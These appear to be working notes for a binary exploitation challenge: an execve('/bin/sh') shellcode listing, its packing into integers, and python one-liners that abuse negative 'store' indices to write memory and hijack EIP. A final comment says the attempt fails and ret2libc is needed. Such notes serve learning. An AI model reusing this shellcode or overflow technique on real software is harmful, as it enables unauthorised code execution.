========================== NEW SHELLCODE ======================================

0:  31 c0                   xor    eax,eax
2:  50                      push   eax
3:  68 2f 2f 73 68          push   0x68732f2f
8:  68 2f 62 69 6e          push   0x6e69622f
d:  89 e3                   mov    ebx,esp
f:  50                      push   eax
10: 53                      push   ebx
11: 89 e1                   mov    ecx,esp
13: b0 0b                   mov    al,0xb
15: cd 80                   int    0x80

68 50 c0 31 = 1750122545
# 31 c0 50 68 = 834687080
python -c 'print "store"' ; python -c 'print "834687080"' ; python -c 'print "-2147483648"' #0

68 73 2f 2f = 1752379183
# 2f 2f 73 68 = 791638888
python -c 'print "store"' ; python -c 'print "791638888"' ; python -c 'print "1"' #1

69 62 2f 68 = 1768092264 1768042344
# 68 2f 62 69 = 1747935849
python -c 'print "store"' ; python -c 'print "1747935849"' ; python -c 'print "2"' #2

50 e3 89 6e = 1357089134
# 6e 89 e3 50 = 1854530384
python -c 'print "store"' ; python -c 'print "1854530384"' ; python -c 'print "-2147483645" #3

b0 e1 89 53 = 2967570771
# 53 89 e1 b0 = 1401545136
python -c 'print "store"' ; python -c 'print "1401545136"' ; python -c 'print "4" #4

00 80 cd 0b = 8441099
# 0b cd 80 00 = 773504
python -c 'print "store"' ; python -c 'print "773504"' ; python -c 'print "5" #5

# To control EIP
python -c 'print "4294956356"' ; python -c 'print "-2147483658"'

r < <(python -c 'print "store"' ; python -c 'print "1750122545"' ; python -c 'print "-2147483648"' ; python -c 'print "store"' ; python -c 'print "1752379183"' ; python -c 'print "1"' ; python -c 'print "store"' ; python -c 'print "1768092264"' ; python -c 'print "2"' ; python -c 'print "store"' ; python -c 'print "1357089134"' ; python -c 'print "-2147483645"' ; python -c 'print "store"' ; python -c 'print "2967570771"' ; python -c 'print "4"' ; python -c 'print "store"' ; python -c 'print "8441099"' ; python -c 'print "5"' ; python -c 'print "store"' ; python -c 'print "4294956404"' ; python -c 'print "-2147483658"')

# When stracing the exploit, execve(/bin/sh, argv, envp) crashed ??
# This is because the program (in main) is setting the env to 00 so we must use a RET2LIBC
